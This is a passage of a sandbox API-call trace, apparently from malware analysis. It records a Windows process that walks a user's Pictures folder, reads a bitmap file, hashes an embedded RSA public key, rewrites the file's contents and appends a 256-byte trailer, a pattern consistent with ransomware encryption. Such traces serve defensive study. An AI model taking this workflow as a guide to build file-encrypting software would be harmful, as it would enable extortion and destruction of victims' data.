PathFindFileNameW (pszPath="") returned="" [0194.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.905] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9867c5b0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9867c5b0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0194.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.906] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9867c5b0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9867c5b0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.906] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e71cb90, ftCreationTime.dwHighDateTime=0x1d8a5d6, ftLastAccessTime.dwLowDateTime=0x5fa78fa0, ftLastAccessTime.dwHighDateTime=0x1d8a5da, ftLastWriteTime.dwLowDateTime=0x5fa78fa0, ftLastWriteTime.dwHighDateTime=0x1d8a5da, nFileSizeHigh=0x0, nFileSizeLow=0x1218c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77x _hI5d64N725mY.bmp", cAlternateFileName="77X_HI~1.BMP")) returned 1 [0194.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0194.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.906] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\77x _hI5d64N725mY.bmp") returned=".bmp" [0194.906] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\77x _hI5d64N725mY.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\77x _hi5d64n725my.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.908] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=74124) returned 1 [0194.908] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.911] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x12166, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.911] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.913] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.913] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x1218c, lpOverlapped=0x0) returned 1 [0194.914] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.914] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.914] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.914] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.916] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.916] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.916] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.916] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.916] GetLastError () returned 0x0 [0194.916] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.916] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.917] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.917] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.917] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12190) returned 0x2ea79b0 [0194.917] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b88 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1188 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ba0 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bd0 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c30 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2be8 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.918] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0194.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0194.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c30 [0194.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0194.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2be8 [0194.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2bd0 [0194.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0194.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0194.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0194.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0194.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0194.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0194.921] GetCurrentThreadId () returned 0x66c [0194.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea02b0 [0194.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0194.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.922] GetCurrentThreadId () returned 0x66c [0194.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0194.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c30 [0194.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bd0 [0194.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0194.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2be8 [0194.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bb8 [0194.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c48 [0194.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0194.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c18 [0194.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c00 [0194.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c60 [0194.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c00 [0194.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0194.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2bd0 [0194.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0194.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0194.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0194.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0194.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0194.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0194.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1188 | out: hHeap=0x620000) returned 1 [0194.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.936] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x12187, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x12187, lpOverlapped=0x0) returned 1 [0194.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.937] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x1218c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.937] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.938] RtlAllocateHeap 